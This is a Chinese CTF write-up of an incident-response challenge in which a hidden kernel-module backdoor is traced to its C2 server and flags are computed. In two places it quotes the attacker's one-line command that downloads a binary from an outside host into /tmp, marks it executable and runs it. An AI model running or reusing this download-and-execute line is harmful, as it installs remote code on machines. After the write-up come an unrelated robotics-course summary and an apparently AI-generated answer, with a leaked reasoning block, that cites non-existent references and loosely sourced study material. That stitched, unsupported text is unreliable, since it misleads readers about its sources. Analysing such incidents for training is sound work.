ciscn暨长城杯 天津赛区 ISW阶段应急响应复现

题目介绍

小路是一名网络安全网管,据反映发现公司主机上有异常外联信息,据回忆前段时间执行过某些更新脚本(已删除),现在需要协助小路同学进行网络安全应急响应分析,查找木马,进一步分析,寻找攻击源头,获取攻击者主机权限获取 flag 文件。

1

找出主机上木马回连的主控端服务器 IP 地址(不定时 (3~5 分钟) 周期性),并以 flag{MD5} 形式提交,其中 MD5 加密目标的原始字符串格式 IP:port

这里一直分析netstat浪费了很多时间

复现时了解到:
这里是 `.ko` 内核相关文件,可能会遇到 `netstat` 检测不到网络连接情况的问题,优先使用 `tcpdump` 直接抓取网卡流量

使用r-studio进行磁盘恢复【AXIOM分析后并没有发现东西(可能是不太会用吧)】

发现被删除的1.txt,和.viminfo
image.png

1.txt

wget –quiet http://mirror.unknownrepo.net/f/l/a/g/system_upgrade -O /tmp/.system_upgrade && chmod +x /tmp/.system_upgrade && /tmp/.system_upgrade

定位到system
image.png
查看启动服务,发现可疑内核
image.png

定位到内核文件
image.png
恢复文件,IDA分析
定位到ULRYvXzICzy880dO函数,发现木马回连的主控端服务器 IP 地址

192.168.57.203:4948

image.png

flag{59110f555b5e5cd0a8713a447b082d63}

2

找出主机上驻留的远控木马文件本体,计算该文件的 MD5, 结果提交形式
这里注意到systemd-agentd
image.png
image.png

flag{bccad26b665ca175cd02aca2903d8b1e}

3

找出主机上加载远控木马的持久化程序(下载者),其功能为下载并执行远控木马,计算该文件的 MD5, 结果提交形式:flag{MD5}

木马就是system-upgrade.ko

计算文件md5:md5sum

image.png

flag{78edba7cbd107eb6e3d2f90f5eca734e }

4

查找题目 3 中持久化程序(下载者)的植入痕迹,计算持久化程序植入时的原始名称 MD5(仅计算文件名称字符串 MD5),并提交对应 flag{MD5}

1.txt

wget –quiet http://mirror.unknownrepo.net/f/l/a/g/system_upgrade -O /tmp/.system_upgrade && chmod +x /tmp/.system_upgrade && /tmp/.system_upgrade

这里下载文件并给予权限,

image.png

flag{9729aaace6c83b11b17b6bc3b340d00b}

参考文章:
https://tryhackmyoffsecbox.github.io/Target-Machines-WriteUp/blog/2025CCB&CISCN-Semis-ISW/

内容概要:《机器人综合基础实践教程》(入门篇、提高篇)涵盖了机器人基础构建、编程控制、传感器应用等多个方面。教程从机械零件简介入手,逐步介绍主控板和编程环境的配置,随后通过一系列实验引导读者动手实践,包括驱动轮模块、双轮万向车、红外启动小车、带传动模块、履带机器人、红绿灯等实验。这些实验不仅帮助读者理解基本原理,还涉及高级应用如蓝牙电子温度计、语音识别、双轮小车平衡、蓝牙排爆机器人和WiFi视频排爆等。教程旨在培养读者的空间构型能力、编程技巧和综合调试能力,为机器人技术的实际应用打下坚实基础。 适用人群:具备一定编程基础和技术兴趣的学生、教师及爱好者,特别是对机器人技术感兴趣的初学者和中级学习者。 使用场景及目标:①帮助学生理解机器人基本原理,掌握机械零件组装和编程控制;②通过实际操作,提升编程和调试技能;③为机器人竞赛、项目开发和创新实践提供理论和实践指导;④培养创新思维和解决实际问题的能力。 其他说明:教程不仅提供详细的实验步骤和代码示例,还配有丰富的参考资料和光盘课件,确保学习者能够全面理解和掌握知识点。此外,教程强调实践操作的重要性,鼓励学习者通过动手实验加深理解,培养独立思考和解决问题的能力。
<think>好的,我现在需要处理用户关于2024长城杯密码学比赛信息和学习资料的请求。首先,我需要检查用户提供的参考引用,看看是否有相关的资料可以直接引用。用户提供了三个引用,其中引用[2]和引用[3]提到了长城杯的密码学题目和取证溯源的内容。 用户的问题集中在密码学相关的比赛信息或学习资料,所以我应该优先关注引用[2],因为它明确提到了crypto部分的题解,包含了一个flag的示例。而引用[3]虽然涉及取证,但可能和密码学没有直接关联,不过可能需要确认是否有交叉内容。引用[1]则主要涉及比赛准备,安装了Wireshark等工具,这对网络分析可能有帮助,但不确定是否直接用于密码学。 接下来,我需要整理已有的信息。引用[2]提到了一个具体的题目,flag的格式为flag{p*q*r*s_32cacb2f994f6b42183a1300d9a3e8d6},这可能涉及到多素数分解或哈希处理。这可以作为解题思路的参考。此外,用户可能需要学习如何分析类似的密码学题目,比如RSA多素数分解、哈希算法识别等。 用户还希望获得学习资料,因此需要推荐相关资源。常见的密码学学习资料包括书籍如《密码编码学与网络安全》、CTF比赛平台如CTFtime,以及在线课程。同时,结合长城杯的特点,可能需要实践操作,如使用Python进行密码分析,工具如OpenSSL、John the Ripper等。 在生成相关问题部分,需要考虑用户可能的后续问题,例如具体题型的解法、备赛建议、实战资源等。需要确保问题有针对性,帮助用户深入理解。 需要验证是否有其他引用内容被遗漏,但根据提供的引用,引用[3]主要涉及应急响应和流量分析,可能与密码学关联不大,但流量分析中有时会涉及加密流量分析,这点可能需要提及,但优先级较低。 最后,确保回答结构清晰,分点列出比赛信息和学习资料,并且每个部分都有对应的引用支持。同时,生成的相关问题要引导用户进一步探索,例如具体解题方法或资料推荐。</think>### 2024长城杯密码学比赛信息及学习资料整理 #### 一、比赛信息与题型参考 1. **题目类型与示例** 根据2024长城杯初赛部分题解,密码学题目涉及多素数分解与哈希结合的综合题型。例如: $$flag\{p*q*r*s\_32cacb2f994f6b42183a1300d9a3e8d6\}$$ 此类题目可能需要分解多个素数$p,q,r,s$,并验证哈希值[^2]。 2. **赛前准备经验** 参赛者通常会通过分析往届题目(如安装Wireshark分析流量)、练习密码学工具(如Python脚本、OpenSSL)提升实战能力[^1]。 #### 二、推荐学习资料 1. **密码学基础书籍** - 《密码编码学与网络安全》:涵盖对称加密、非对称加密、哈希算法等核心内容。 -CTF竞赛权威指南(Pwn篇)》:包含密码学实战案例。 2. **实践平台与工具** - **CTF比赛平台**:CTFtime(汇总全球赛事)、攻防世界(含长城杯题型复现)。 - **工具库**:Python的`pycryptodome`库、RSA分解工具`yafu`。 3. **往届资源与题解** - 2024长城杯初赛密码学题解(参考示例中的多素数分解思路)。 - 第一届决赛取证题中的流量分析技巧(如使用Wireshark识别加密流量)[^3]。 #### 三、实战建议 1. **重点题型训练** - 多素数RSA分解(涉及大整数分解算法) - 哈希碰撞与彩虹表攻击(如示例中的`32cacb...`后缀) 2. **模拟环境搭建** - 在Linux系统中配置Python密码学开发环境,例如: ```python from Crypto.Util.number import bytes_to_long, getPrime p = getPrime(512) # 生成512位素数 ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值